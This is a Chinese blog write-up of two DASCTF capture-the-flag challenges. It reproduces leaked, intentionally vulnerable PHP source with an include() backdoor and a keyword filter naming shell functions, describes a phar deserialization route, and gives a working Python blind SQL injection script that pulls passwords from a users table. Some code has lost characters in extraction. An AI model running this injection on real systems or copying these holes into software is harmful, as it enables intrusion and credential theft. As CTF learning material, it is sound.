书接上会,DASCTF由于我那天蹲24h麦当劳睡了一个晚上,到了酒店继续睡了一个下午,导致看到这题的时候已经只剩下一小时了。最后比赛结束后一个多小时才解出来,不过博客还是要有的。
Ez to getflag
这题第一眼看,任意文件读,然后获取源码Getshell。
其实呢,直接
,就出了,可以说是非预期吧。/flag
从原题思路的角度来说,我们先读取
,获取后端源码file.php
<code>和</code>
upload.php
//file.php
show();
?>
///upload.php
uploadfile();
?>
里面嵌套了一个
,也读出来class.php
//class.php
f = _FILES;
}
function savefile() {fname = md5(this->f["file"]["name"]).".png"; if(file_exists('./upload/'.fname)) {
@unlink('./upload/'.fname);
}
move_uploaded_file(this->f["file"]["tmp_name"],"upload/" . fname); echo "upload success! :D"; } function __toString(){cont = this->fname;size = this->fsize;
echocont->size;
return 'this_is_upload';
}
function uploadfile() { if(this->file_check()) {
this->savefile(); } }
function file_check() {allowed_types = array("png");
temp = explode(".",this->f["file"]["name"]);
extension = end(temp);
if(empty(extension)) { echo "what are you uploaded? :0";
return false;
}
else{ if(in_array(extension,allowed_types)) {filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';
$f = file_get_contents($this->f["file"]["tmp_name"]);
if(preg_match_all(filter,f)){
echo 'what are you doing!! :C';
return false;
}
return true;
}
else {
echo 'png onlyyy! XP';
return false;
}
}
}
}
class Show{
public source;
public function __construct(fname)
{
this->source =fname;
}
public function show()
{
if(preg_match('/http|https|file:|php:|gopher|dict|\.\./i',this->source)) {
die('illegal fname :P');
} else {
echo file_get_contents(this->source);
src = "data:jpg;base64,".base64_encode(file_get_contents(this->source));
echo "
";
}
}
function __get(name)
{this->ok(name);
}
public function __call(name, arguments)
{
if(end(arguments)=='phpinfo'){
phpinfo();
}else{
this->backdoor(end(arguments));
}
return name;
}
public function backdoor(door){
include(door);
echo "hacked!!";
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i",this->source)) {
die("illegal fname XD");
}
}
}
class Test{
public str;
public function __construct(){this->str="It's works";
}
public function __destruct()
{
echo $this->str;
}
}
?>
发现ban了gopher协议,那就直接phar反序列化直接做就好
绝对防御
这题其实可以自己找网页的接口,不过在这么一个静态网页里面找出来还是有点难,至少我找了好久才找到。
最后被人安利了一个这样的插件
一下子就找到了,真的舒服,然后就是正常的联合盲注,注表名,注数据了。
发现自己以前写的盲注脚本好丑,抄一个好看的上来。
import string
import requests
url = 'http:///SUPPERAPI.php?id='
char = string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}-_~!,"
digit = string.digits
flag = ""
for i in range(1,100):
for j in range(32,128):
print(j)
payload = f"ascii(substr((select group_concat(password) from users), {i}, 1))='{j}'"
data = f"0||{payload}"
res = requests.get(url + data)
if "admin" in res.text:
flag += chr(j)
print("flag:" + flag)
break